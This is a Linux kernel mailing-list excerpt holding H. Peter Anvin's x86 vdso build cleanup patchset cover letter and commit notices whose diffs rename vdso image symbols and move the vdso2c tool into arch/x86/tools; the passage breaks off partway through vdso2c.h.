x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 93d73005bff4f600696ce30e366e742c3373b13d
Gitweb: https://git.kernel.org/tip/93d73005bff4f600696ce30e366e742c3373b13d
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:55 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 15:33:20 -08:00
x86/entry/vdso: Rename vdso_image_* to vdso*_image
The vdso .so files are named vdso*.so. These structures are binary
images and descriptions of these files, so it is more consistent for
them to have a naming that more directly mirrors the filenames.
It is also very slightly more compact (by one character...) and
simplifies the Makefile just a little bit.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-2-hpa@zytor.com
---
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 ++++-------
arch/x86/entry/vdso/Makefile | 8 ++++----
arch/x86/entry/vdso/vma.c | 10 +++++-----
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +++---
arch/x86/kernel/process_64.c | 6 +++---
arch/x86/kernel/signal_32.c | 4 ++--
8 files changed, 23 insertions(+), 26 deletions(-)
diff --git a/arch/x86/entry/syscall_32.c b/arch/x86/entry/syscall_32.c
index a67a644..8e82957 100644
--- a/arch/x86/entry/syscall_32.c
+++ b/arch/x86/entry/syscall_32.c
@@ -319,7 +319,7 @@ __visible noinstr bool do_fast_syscall_32(struct pt_regs *regs)
* convention. Adjust regs so it looks like we entered using int80.
*/
unsigned long landing_pad = (unsigned long)current->mm->context.vdso +
- vdso_image_32.sym_int80_landing_pad;
+ vdso32_image.sym_int80_landing_pad;
/*
* SYSENTER loses EIP, and even SYSCALL32 needs us to skip forward
diff --git a/arch/x86/entry/vdso/.gitignore b/arch/x86/entry/vdso/.gitignore
index 37a6129..eb60859 100644
--- a/arch/x86/entry/vdso/.gitignore
+++ b/arch/x86/entry/vdso/.gitignore
@@ -1,8 +1,5 @@
# SPDX-License-Identifier: GPL-2.0-only
-vdso.lds
-vdsox32.lds
-vdso32-syscall-syms.lds
-vdso32-sysenter-syms.lds
-vdso32-int80-syms.lds
-vdso-image-*.c
-vdso2c
+*.lds
+*.so
+*.so.dbg
+vdso*-image.c
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index f247f5f..7f83302 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -16,9 +16,9 @@ vobjs-$(CONFIG_X86_SGX) += vsgx.o
obj-y += vma.o extable.o
# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso-image-64.o
-obj-$(CONFIG_X86_X32_ABI) += vdso-image-x32.o
-obj-$(CONFIG_COMPAT_32) += vdso-image-32.o vdso32-setup.o
+obj-$(CONFIG_X86_64) += vdso64-image.o
+obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
+obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
vobjs := $(addprefix $(obj)/, $(vobjs-y))
vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
@@ -44,7 +44,7 @@ hostprogs += vdso2c
quiet_cmd_vdso2c = VDSO2C $@
cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
-$(obj)/vdso-image-%.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index afe105b..8f98c2d 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,7 +65,7 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
struct pt_regs *regs = current_pt_regs();
unsigned long vdso_land = image->sym_int80_landing_pad;
unsigned long old_land_addr = vdso_land +
@@ -230,7 +230,7 @@ static int load_vdso32(void)
if (vdso32_enabled != 1) /* Other values all mean "disabled" */
return 0;
- return map_vdso(&vdso_image_32, 0);
+ return map_vdso(&vdso32_image, 0);
}
int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
@@ -239,7 +239,7 @@ int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_64, 0);
+ return map_vdso(&vdso64_image, 0);
}
return load_vdso32();
@@ -252,7 +252,7 @@ int compat_arch_setup_additional_pages(struct linux_binprm *bprm,
if (IS_ENABLED(CONFIG_X86_X32_ABI) && x32) {
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_x32, 0);
+ return map_vdso(&vdsox32_image, 0);
}
if (IS_ENABLED(CONFIG_IA32_EMULATION))
@@ -267,7 +267,7 @@ bool arch_syscall_is_vdso_sigreturn(struct pt_regs *regs)
const struct vdso_image *image = current->mm->context.vdso_image;
unsigned long vdso = (unsigned long) current->mm->context.vdso;
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
if (regs->ip == vdso + image->sym_vdso32_sigreturn_landing_pad ||
regs->ip == vdso + image->sym_vdso32_rt_sigreturn_landing_pad)
return true;
diff --git a/arch/x86/include/asm/elf.h b/arch/x86/include/asm/elf.h
index 6c8fdc9..2ba5f16 100644
--- a/arch/x86/include/asm/elf.h
+++ b/arch/x86/include/asm/elf.h
@@ -361,7 +361,7 @@ else if (IS_ENABLED(CONFIG_IA32_EMULATION)) \
#define VDSO_ENTRY \
((unsigned long)current->mm->context.vdso + \
- vdso_image_32.sym___kernel_vsyscall)
+ vdso32_image.sym___kernel_vsyscall)
struct linux_binprm;
diff --git a/arch/x86/include/asm/vdso.h b/arch/x86/include/asm/vdso.h
index b7253ef..e8afbe9 100644
--- a/arch/x86/include/asm/vdso.h
+++ b/arch/x86/include/asm/vdso.h
@@ -27,9 +27,9 @@ struct vdso_image {
long sym_vdso32_rt_sigreturn_landing_pad;
};
-extern const struct vdso_image vdso_image_64;
-extern const struct vdso_image vdso_image_x32;
-extern const struct vdso_image vdso_image_32;
+extern const struct vdso_image vdso64_image;
+extern const struct vdso_image vdsox32_image;
+extern const struct vdso_image vdso32_image;
extern int __init init_vdso_image(const struct vdso_image *image);
diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
index 432c0a0..08e72f4 100644
--- a/arch/x86/kernel/process_64.c
+++ b/arch/x86/kernel/process_64.c
@@ -941,14 +941,14 @@ long do_arch_prctl_64(struct task_struct *task, int option, unsigned long arg2)
#ifdef CONFIG_CHECKPOINT_RESTORE
# ifdef CONFIG_X86_X32_ABI
case ARCH_MAP_VDSO_X32:
- return prctl_map_vdso(&vdso_image_x32, arg2);
+ return prctl_map_vdso(&vdsox32_image, arg2);
# endif
# ifdef CONFIG_IA32_EMULATION
case ARCH_MAP_VDSO_32:
- return prctl_map_vdso(&vdso_image_32, arg2);
+ return prctl_map_vdso(&vdso32_image, arg2);
# endif
case ARCH_MAP_VDSO_64:
- return prctl_map_vdso(&vdso_image_64, arg2);
+ return prctl_map_vdso(&vdso64_image, arg2);
#endif
#ifdef CONFIG_ADDRESS_MASKING
case ARCH_GET_UNTAG_MASK:
diff --git a/arch/x86/kernel/signal_32.c b/arch/x86/kernel/signal_32.c
index 42bbc42..e55cf19 100644
--- a/arch/x86/kernel/signal_32.c
+++ b/arch/x86/kernel/signal_32.c
@@ -282,7 +282,7 @@ int ia32_setup_frame(struct ksignal *ksig, struct pt_regs *regs)
/* Return stub is in 32bit vsyscall page */
if (current->mm->context.vdso)
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_sigreturn;
+ vdso32_image.sym___kernel_sigreturn;
else
restorer = &frame->retcode;
}
@@ -368,7 +368,7 @@ int ia32_setup_rt_frame(struct ksignal *ksig, struct pt_regs *regs)
restorer = ksig->ka.sa.sa_restorer;
else
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_rt_sigreturn;
+ vdso32_image.sym___kernel_rt_sigreturn;
unsafe_put_user(ptr_to_compat(restorer), &frame->pretcode, Efault);
/*
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:01:26 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: a76108d05ee13cddb72b620752a80b2c3e87aee1
Gitweb: https://git.kernel.org/tip/a76108d05ee13cddb72b620752a80b2c3e87aee1
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:56 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 15:33:20 -08:00
x86/entry/vdso: Move vdso2c to arch/x86/tools
It is generally better to build tools in arch/x86/tools to keep host
cflags proliferation down, and to reduce makefile sequencing issues.
Move the vdso build tool vdso2c into arch/x86/tools in preparation for
refactoring the vdso makefiles.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-3-hpa@zytor.com
---
arch/x86/Makefile | 2 +-
arch/x86/entry/vdso/Makefile | 7 +-
arch/x86/entry/vdso/vdso2c.c | 233 +----------------------------------
arch/x86/entry/vdso/vdso2c.h | 208 +------------------------------
arch/x86/tools/Makefile | 15 +-
arch/x86/tools/vdso2c.c | 233 ++++++++++++++++++++++++++++++++++-
arch/x86/tools/vdso2c.h | 208 ++++++++++++++++++++++++++++++-
7 files changed, 455 insertions(+), 451 deletions(-)
delete mode 100644 arch/x86/entry/vdso/vdso2c.c
delete mode 100644 arch/x86/entry/vdso/vdso2c.h
create mode 100644 arch/x86/tools/vdso2c.c
create mode 100644 arch/x86/tools/vdso2c.h
diff --git a/arch/x86/Makefile b/arch/x86/Makefile
index 1d403a3..9ab7522 100644
--- a/arch/x86/Makefile
+++ b/arch/x86/Makefile
@@ -252,7 +252,7 @@ endif
archscripts: scripts_basic
- $(Q)$(MAKE) $(build)=arch/x86/tools relocs
+ $(Q)$(MAKE) $(build)=arch/x86/tools relocs vdso2c
###
# Syscall table generation
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 7f83302..3d9b09f 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -38,13 +38,12 @@ VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
$(call if_changed,vdso_and_check)
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi -I$(srctree)/arch/$(SUBARCH)/include/uapi
-hostprogs += vdso2c
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/entry/vdso/vdso2c.c b/arch/x86/entry/vdso/vdso2c.c
deleted file mode 100644
index f84e8f8..0000000
--- a/arch/x86/entry/vdso/vdso2c.c
+++ /dev/null
@@ -1,233 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0-only
-/*
- * vdso2c - A vdso image preparation tool
- * Copyright (c) 2014 Andy Lutomirski and others
- *
- * vdso2c requires stripped and unstripped input. It would be trivial
- * to fully strip the input in here, but, for reasons described below,
- * we need to write a section table. Doing this is more or less
- * equivalent to dropping all non-allocatable sections, but it's
- * easier to let objcopy handle that instead of doing it ourselves.
- * If we ever need to do something fancier than what objcopy provides,
- * it would be straightforward to add here.
- *
- * We're keep a section table for a few reasons:
- *
- * The Go runtime had a couple of bugs: it would read the section
- * table to try to figure out how many dynamic symbols there were (it
- * shouldn't have looked at the section table at all) and, if there
- * were no SHT_SYNDYM section table entry, it would use an
- * uninitialized value for the number of symbols. An empty DYNSYM
- * table would work, but I see no reason not to write a valid one (and
- * keep full performance for old Go programs). This hack is only
- * needed on x86_64.
- *
- * The bug was introduced on 2012-08-31 by:
- * https://code.google.com/p/go/source/detail?r=56ea40aac72b
- * and was fixed on 2014-06-13 by:
- * https://code.google.com/p/go/source/detail?r=fc1cd5e12595
- *
- * Binutils has issues debugging the vDSO: it reads the section table to
- * find SHT_NOTE; it won't look at PT_NOTE for the in-memory vDSO, which
- * would break build-id if we removed the section table. Binutils
- * also requires that shstrndx != 0. See:
- * https://sourceware.org/bugzilla/show_bug.cgi?id=17064
- *
- * elfutils might not look for PT_NOTE if there is a section table at
- * all. I don't know whether this matters for any practical purpose.
- *
- * For simplicity, rather than hacking up a partial section table, we
- * just write a mostly complete one. We omit non-dynamic symbols,
- * though, since they're rather large.
- *
- * Once binutils gets fixed, we might be able to drop this for all but
- * the 64-bit vdso, since build-id only works in kernel RPMs, and
- * systems that update to new enough kernel RPMs will likely update
- * binutils in sync. build-id has never worked for home-built kernel
- * RPMs without manual symlinking, and I suspect that no one ever does
- * that.
- */
-
-#include <inttypes.h>
-#include <stdint.h>
-#include <unistd.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#include <fcntl.h>
-#include <err.h>
-
-#include <sys/mman.h>
-#include <sys/types.h>
-
-#include <tools/le_byteshift.h>
-
-#include <linux/elf.h>
-#include <linux/types.h>
-#include <linux/kernel.h>
-
-const char *outfilename;
-
-struct vdso_sym {
- const char *name;
- bool export;
-};
-
-struct vdso_sym required_syms[] = {
- {"VDSO32_NOTE_MASK", true},
- {"__kernel_vsyscall", true},
- {"__kernel_sigreturn", true},
- {"__kernel_rt_sigreturn", true},
- {"int80_landing_pad", true},
- {"vdso32_rt_sigreturn_landing_pad", true},
- {"vdso32_sigreturn_landing_pad", true},
-};
-
-__attribute__((format(printf, 1, 2))) __attribute__((noreturn))
-static void fail(const char *format, ...)
-{
- va_list ap;
- va_start(ap, format);
- fprintf(stderr, "Error: ");
- vfprintf(stderr, format, ap);
- if (outfilename)
- unlink(outfilename);
- exit(1);
- va_end(ap);
-}
-
-/*
- * Evil macros for little-endian reads and writes
- */
-#define GLE(x, bits, ifnot) \
- __builtin_choose_expr( \
- (sizeof(*(x)) == bits/8), \
- (__typeof__(*(x)))get_unaligned_le##bits(x), ifnot)
-
-extern void bad_get_le(void);
-#define LAST_GLE(x) \
- __builtin_choose_expr(sizeof(*(x)) == 1, *(x), bad_get_le())
-
-#define GET_LE(x) \
- GLE(x, 64, GLE(x, 32, GLE(x, 16, LAST_GLE(x))))
-
-#define PLE(x, val, bits, ifnot) \
- __builtin_choose_expr( \
- (sizeof(*(x)) == bits/8), \
- put_unaligned_le##bits((val), (x)), ifnot)
-
-extern void bad_put_le(void);
-#define LAST_PLE(x, val) \
- __builtin_choose_expr(sizeof(*(x)) == 1, *(x) = (val), bad_put_le())
-
-#define PUT_LE(x, val) \
- PLE(x, val, 64, PLE(x, val, 32, PLE(x, val, 16, LAST_PLE(x, val))))
-
-
-#define NSYMS ARRAY_SIZE(required_syms)
-
-#define BITSFUNC3(name, bits, suffix) name##bits##suffix
-#define BITSFUNC2(name, bits, suffix) BITSFUNC3(name, bits, suffix)
-#define BITSFUNC(name) BITSFUNC2(name, ELF_BITS, )
-
-#define INT_BITS BITSFUNC2(int, ELF_BITS, _t)
-
-#define ELF_BITS_XFORM2(bits, x) Elf##bits##_##x
-#define ELF_BITS_XFORM(bits, x) ELF_BITS_XFORM2(bits, x)
-#define ELF(x) ELF_BITS_XFORM(ELF_BITS, x)
-
-#define ELF_BITS 64
-#include "vdso2c.h"
-#undef ELF_BITS
-
-#define ELF_BITS 32
-#include "vdso2c.h"
-#undef ELF_BITS
-
-static void go(void *raw_addr, size_t raw_len,
- void *stripped_addr, size_t stripped_len,
- FILE *outfile, const char *name)
-{
- Elf64_Ehdr *hdr = (Elf64_Ehdr *)raw_addr;
-
- if (hdr->e_ident[EI_CLASS] == ELFCLASS64) {
- go64(raw_addr, raw_len, stripped_addr, stripped_len,
- outfile, name);
- } else if (hdr->e_ident[EI_CLASS] == ELFCLASS32) {
- go32(raw_addr, raw_len, stripped_addr, stripped_len,
- outfile, name);
- } else {
- fail("unknown ELF class\n");
- }
-}
-
-static void map_input(const char *name, void **addr, size_t *len, int prot)
-{
- off_t tmp_len;
-
- int fd = open(name, O_RDONLY);
- if (fd == -1)
- err(1, "open(%s)", name);
-
- tmp_len = lseek(fd, 0, SEEK_END);
- if (tmp_len == (off_t)-1)
- err(1, "lseek");
- *len = (size_t)tmp_len;
-
- *addr = mmap(NULL, tmp_len, prot, MAP_PRIVATE, fd, 0);
- if (*addr == MAP_FAILED)
- err(1, "mmap");
-
- close(fd);
-}
-
-int main(int argc, char **argv)
-{
- size_t raw_len, stripped_len;
- void *raw_addr, *stripped_addr;
- FILE *outfile;
- char *name, *tmp;
- int namelen;
-
- if (argc != 4) {
- printf("Usage: vdso2c RAW_INPUT STRIPPED_INPUT OUTPUT\n");
- return 1;
- }
-
- /*
- * Figure out the struct name. If we're writing to a .so file,
- * generate raw output instead.
- */
- name = strdup(argv[3]);
- namelen = strlen(name);
- if (namelen >= 3 && !strcmp(name + namelen - 3, ".so")) {
- name = NULL;
- } else {
- tmp = strrchr(name, '/');
- if (tmp)
- name = tmp + 1;
- tmp = strchr(name, '.');
- if (tmp)
- *tmp = '\0';
- for (tmp = name; *tmp; tmp++)
- if (*tmp == '-')
- *tmp = '_';
- }
-
- map_input(argv[1], &raw_addr, &raw_len, PROT_READ);
- map_input(argv[2], &stripped_addr, &stripped_len, PROT_READ);
-
- outfilename = argv[3];
- outfile = fopen(outfilename, "w");
- if (!outfile)
- err(1, "fopen(%s)", outfilename);
-
- go(raw_addr, raw_len, stripped_addr, stripped_len, outfile, name);
-
- munmap(raw_addr, raw_len);
- munmap(stripped_addr, stripped_len);
- fclose(outfile);
-
- return 0;
-}
diff --git a/arch/x86/entry/vdso/vdso2c.h b/arch/x86/entry/vdso/vdso2c.h
deleted file mode 100644
index 78ed1c1..0000000
--- a/arch/x86/entry/vdso/vdso2c.h
+++ /dev/null
@@ -1,208 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * This file is included twice from vdso2c.c. It generates code for 32-bit
- * and 64-bit vDSOs. We need both for 64-bit builds, since 32-bit vDSOs
- * are built for 32-bit userspace.
- */
-
-static void BITSFUNC(copy)(FILE *outfile, const unsigned char *data, size_t len)
-{
- size_t i;
-
- for (i = 0; i < len; i++) {
- if (i % 10 == 0)
- fprintf(outfile, "\n\t");
- fprintf(outfile, "0x%02X, ", (int)(data)[i]);
- }
-}
-
-
-/*
- * Extract a section from the input data into a standalone blob. Used to
- * capture kernel-only data that needs to persist indefinitely, e.g. the
- * exception fixup tables, but only in the kernel, i.e. the section can
- * be stripped from the final vDSO image.
- */
-static void BITSFUNC(extract)(const unsigned char *data, size_t data_len,
- FILE *outfile, ELF(Shdr) *sec, const char *name)
-{
- unsigned long offset;
- size_t len;
-
- offset = (unsigned long)GET_LE(&sec->sh_offset);
- len = (size_t)GET_LE(&sec->sh_size);
-
- if (offset + len > data_len)
- fail("section to extract overruns input data");
-
- fprintf(outfile, "static const unsigned char %s[%zu] = {", name, len);
- BITSFUNC(copy)(outfile, data + offset, len);
- fprintf(outfile, "\n};\n\n");
-}
-
-static void BITSFUNC(go)(void *raw_addr, size_t raw_len,
- void *stripped_addr, size_t stripped_len,
- FILE *outfile, const char *image_name)
-{
- int found_load = 0;
- unsigned long load_size = -1; /* Work around bogus warning */
- unsigned long mapping_size;
- ELF(Ehdr) *hdr = (ELF(Ehdr) *)raw_addr;
- unsigned long i, syms_nr;
- ELF(Shdr) *symtab_hdr = NULL, *strtab_hdr, *secstrings_hdr,
- *alt_sec = NULL, *extable_sec = NULL;
- ELF(Dyn) *dyn = 0, *dyn_end = 0;
- const char *secstrings;
- INT_BITS syms[NSYMS] = {};
-
- ELF(Phdr) *pt = (ELF(Phdr) *)(raw_addr + GET_LE(&hdr->e_phoff));
-
- if (GET_LE(&hdr->e_type) != ET_DYN)
- fail("input is not a shared object\n");
-
- /* Walk the segment table. */
- for (i = 0; i < GET_LE(&hdr->e_phnum); i++) {
- if (GET_LE(&pt[i].p_type) == PT_LOAD) {
- if (found_load)
- fail("multiple PT_LOAD segs\n");
-
- if (GET_LE(&pt[i].p_offset) != 0 ||
- GET_LE(&pt[i].p_vaddr) != 0)
- fail("PT_LOAD in wrong place\n");
-
- if (GET_LE(&pt[i].p_memsz) != GET_LE(&pt[i].p_filesz))
- fail("cannot handle memsz != filesz\n");
-
- load_size = GET_LE(&pt[i].p_memsz);
- found_load = 1;
- } else if (GET_LE(&pt[i].p_type) == PT_DYNAMIC) {
- dyn = raw_addr + GET_LE(&pt[i].p_offset);
- dyn_end = raw_addr + GET_LE(&pt[i].p_offset) +
- GET_LE(&pt[i].p_memsz);
- }
- }
- if (!found_load)
- fail("no PT_LOAD seg\n");
-
- if (stripped_len < load_size)
- fail("stripped input is too short\n");
-
- if (!dyn)
- fail("input has no PT_DYNAMIC section -- your toolchain is buggy\n");
-
- /* Walk the dynamic table */
- for (i = 0; dyn + i < dyn_end &&
- GET_LE(&dyn[i].d_tag) != DT_NULL; i++) {
- typeof(dyn[i].d_tag) tag = GET_LE(&dyn[i].d_tag);
- if (tag == DT_REL || tag == DT_RELSZ || tag == DT_RELA ||
- tag == DT_RELENT || tag == DT_TEXTREL)
- fail("vdso image contains dynamic relocations\n");
- }
-
